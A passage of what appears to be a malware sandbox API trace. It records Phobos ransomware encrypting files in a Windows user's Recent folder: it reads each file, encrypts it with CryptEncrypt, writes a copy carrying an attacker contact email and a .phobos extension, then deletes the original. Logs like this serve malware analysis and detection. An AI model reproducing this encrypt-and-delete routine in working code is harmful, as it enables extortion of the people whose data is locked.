"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gvov_se5blg8n.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.649] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.649] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.649] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x9f9, lpOverlapped=0x0) returned 1 [0200.650] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa00, dwBufLen=0xa00 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa00) returned 1 [0200.650] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa00, lpOverlapped=0x0) returned 1 [0200.653] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0200.653] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.653] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0200.653] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.653] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0200.654] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.654] CloseHandle (hObject=0x160) returned 1 [0200.654] CloseHandle (hObject=0xac) returned 1 [0200.654] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gVOV_SE5Blg8N.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gvov_se5blg8n.flv.lnk")) returned 1 [0200.655] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gyEMvXd57lwngR3S.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gyemvxd57lwngr3s.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.662] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3787) returned 1 [0200.662] CloseHandle (hObject=0xac) returned 1 [0200.662] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gyEMvXd57lwngR3S.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gyemvxd57lwngr3s.lnk")) returned 0x20 [0200.662] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gyEMvXd57lwngR3S.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gyemvxd57lwngr3s.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gyEMvXd57lwngR3S.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gyemvxd57lwngr3s.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.663] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.663] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gyEMvXd57lwngR3S.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gyemvxd57lwngr3s.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.664] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.664] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.664] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xecb, lpOverlapped=0x0) returned 1 [0200.665] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xed0, dwBufLen=0xed0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xed0) returned 1 [0200.665] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xed0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xed0, lpOverlapped=0x0) returned 1 [0200.666] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0200.666] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.666] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0200.666] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.666] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0200.667] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.667] CloseHandle (hObject=0xac) returned 1 [0200.667] CloseHandle (hObject=0x160) returned 1 [0200.667] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\gyEMvXd57lwngR3S.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gyemvxd57lwngr3s.lnk")) returned 1 [0200.668] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.668] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GyH9tFXtnU2kfsyVw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gyh9tfxtnu2kfsyvw.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.668] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=614) returned 1 [0200.669] CloseHandle (hObject=0x160) returned 1 [0200.669] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GyH9tFXtnU2kfsyVw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gyh9tfxtnu2kfsyvw.lnk")) returned 0x20 [0200.669] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GyH9tFXtnU2kfsyVw.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gyh9tfxtnu2kfsyvw.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GyH9tFXtnU2kfsyVw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gyh9tfxtnu2kfsyvw.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.669] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.669] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GyH9tFXtnU2kfsyVw.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gyh9tfxtnu2kfsyvw.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.670] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.670] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.670] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x266, lpOverlapped=0x0) returned 1 [0200.671] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x270, dwBufLen=0x270 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x270) returned 1 [0200.671] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x270, lpOverlapped=0x0) returned 1 [0200.672] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0200.672] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.672] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0200.672] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.672] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0200.672] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.672] CloseHandle (hObject=0x160) returned 1 [0200.672] CloseHandle (hObject=0xac) returned 1 [0200.672] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GyH9tFXtnU2kfsyVw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gyh9tfxtnu2kfsyvw.lnk")) returned 1 [0200.673] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.673] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\h5YwO4Ok9d1jB.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\h5ywo4ok9d1jb.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.675] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2648) returned 1 [0200.675] CloseHandle (hObject=0xac) returned 1 [0200.675] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\h5YwO4Ok9d1jB.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\h5ywo4ok9d1jb.lnk")) returned 0x20 [0200.676] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\h5YwO4Ok9d1jB.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\h5ywo4ok9d1jb.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\h5YwO4Ok9d1jB.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\h5ywo4ok9d1jb.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.676] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.676] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\h5YwO4Ok9d1jB.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\h5ywo4ok9d1jb.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.677] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.677] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.677] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa58, lpOverlapped=0x0) returned 1 [0200.678] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa60, dwBufLen=0xa60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa60) returned 1 [0200.678] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa60, lpOverlapped=0x0) returned 1 [0200.679] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0200.679] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.679] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0200.679] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.679] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0200.679] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.679] CloseHandle (hObject=0xac) returned 1 [0200.679] CloseHandle (hObject=0x160) returned 1 [0200.679] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\h5YwO4Ok9d1jB.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\h5ywo4ok9d1jb.lnk")) returned 1 [0200.680] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.680] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\h9DWAy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\h9dway.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.788] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=557) returned 1 [0200.788] CloseHandle (hObject=0x124) returned 1 [0200.788] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\h9DWAy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\h9dway.lnk")) returned 0x20 [0200.788] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\h9DWAy.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\h9dway.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\h9DWAy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\h9dway.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.788] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.788] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\h9DWAy.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\h9dway.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.789] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328e8) returned 1 [0200.789] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.789] ReadFile (in: hFile=0x124, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x22d, lpOverlapped=0x0) returned 1 [0200.790] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x230, dwBufLen=0x230 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x230) returned 1 [0200.790] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x230, lpOverlapped=0x0) returned 1 [0200.791] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32be8) returned 1 [0200.791] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.791] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0200.791] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.791] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0200.791] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.791] CloseHandle (hObject=0x124) returned 1 [0200.791] CloseHandle (hObject=0x178) returned 1 [0200.791] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\h9DWAy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\h9dway.lnk")) returned 1 [0200.792] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IQCk1WOIKqKA.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\iqck1woikqka.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.792] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1025) returned 1 [0200.792] CloseHandle (hObject=0x178) returned 1 [0200.792] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IQCk1WOIKqKA.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\iqck1woikqka.lnk")) returned 0x20 [0200.793] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IQCk1WOIKqKA.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\iqck1woikqka.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\IQCk1WOIKqKA.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\iqck1woikqka.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0200.793] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.793] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.793] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 